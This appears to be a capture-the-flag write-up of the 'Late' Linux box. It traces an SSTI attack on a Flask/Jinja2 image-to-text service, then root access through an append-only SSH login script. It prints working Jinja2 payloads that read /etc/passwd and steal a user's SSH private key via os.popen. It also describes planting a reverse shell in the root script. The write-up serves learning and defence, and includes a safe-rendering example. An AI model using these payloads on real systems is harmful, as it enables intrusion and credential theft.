Late was an easy-rated Linux box with a subdomain offering a service that converts an image containing text into a text file. Since the application was built with Flask, it was vulnerable to SSTI (Server-Side Template Injection), through which we can read the SSH key of the svc_acc user, although it was a pain getting the right aspect ratio and font for the payload image, as the text otherwise wasn't parsed properly. With a user shell we can run pspy to watch the background processes; that showed ssh-alert.sh being executed, and we can append shell commands to it to get root.


Nmap scan report for
Host is up (0.14s latency).
Not shown: 65533 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


On port 80, nginx hosts a web page, and that page references the subdomain images.late.htb.

Let's add the domain name to the /etc/hosts file.

So let's try uploading an image containing some text and see whether it actually converts the image into text.

I grabbed this image for the test, and after uploading it we get a file named results.txt with the image text.


We can test for SSTI since this is a Flask application, as the main page says. Jinja2 is normally used for templates, so we can try {{7*'7'}}: if it returns 7777777, the app is vulnerable to SSTI and is using Jinja2; if it returns 49, it would be using Twig.


So to make this work, we can take a screenshot of {{7*'7'}} in a text editor and save it as an image.
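As an added example (not the Late application's own code), here is the Flask/Jinja2 pattern that makes the text from that screenshot evaluate, beside the fixed version that passes the OCR text in as a template variable. It assumes only the jinja2 library and a constructed OCR string.

```python
# Added example, not the Late application's code: how an image-to-text page built
# on Flask/Jinja2 ends up evaluating {{7*'7'}}, beside the fixed rendering path.
# Assumes only the jinja2 library; Flask's render_template_string uses the same
# Environment semantics (autoescape on) under the hood.
from jinja2 import Environment

env = Environment(autoescape=True)

# Constructed sample: text an OCR step might return from the uploaded screenshot.
OCR_TEXT = "{{7*'7'}}"


def render_unsafe(text: str) -> str:
    """Vulnerable pattern: untrusted text is spliced into the template SOURCE,
    so Jinja2 parses and evaluates any {{ ... }} expression it contains."""
    template = env.from_string("<pre>" + text + "</pre>")
    return template.render()


def render_safe(text: str) -> str:
    """Fixed pattern: the template source is a constant and the text arrives as
    a context variable; it is treated as data and HTML-escaped, never parsed."""
    template = env.from_string("<pre>{{ text }}</pre>")
    return template.render(text=text)


def classify_engine(rendered: str) -> str:
    """The fingerprint from the writeup: 7*'7' is string repetition in Python,
    so Jinja2 yields 7777777, while Twig coerces to numbers and yields 49."""
    if "7777777" in rendered:
        return "jinja2"
    if "49" in rendered:
        return "twig"
    return "not evaluated"


if __name__ == "__main__":
    unsafe = render_unsafe(OCR_TEXT)
    safe = render_safe(OCR_TEXT)
    print("unsafe:", unsafe, "->", classify_engine(unsafe))
    print("safe:  ", safe, "->", classify_engine(safe))
```

The safe path returns the braces and quotes as escaped literal text, which is also what a defender should expect to see in results.txt from a patched version of the service.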

It works; now it's time to test for command execution. We can use this payload to test whether we can read files:

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

After uploading this, we get the /etc/passwd file.

Now, even though we can execute commands, we can't get a reverse shell from here:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

Which would return us the output of id.

Instead, we can grab the SSH key for svc_acc:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/svc_acc/.ssh/id_rsa').read() }}

After getting a shell, we can check what's running in the background; for that we can use pspy.

Looking at the script, it looks like a normal SSH alert that is sent to root's mail, but in pspy we notice that the script is executed whenever we log in through SSH. Also, we can only append content to the script, as it has the append-only (a) attribute, which we can see with lsattr.

So we just need to add a reverse shell, and it will be executed on either logging in to or logging out of SSH.

The script will be executed and we'll have our reverse shell as the root user.
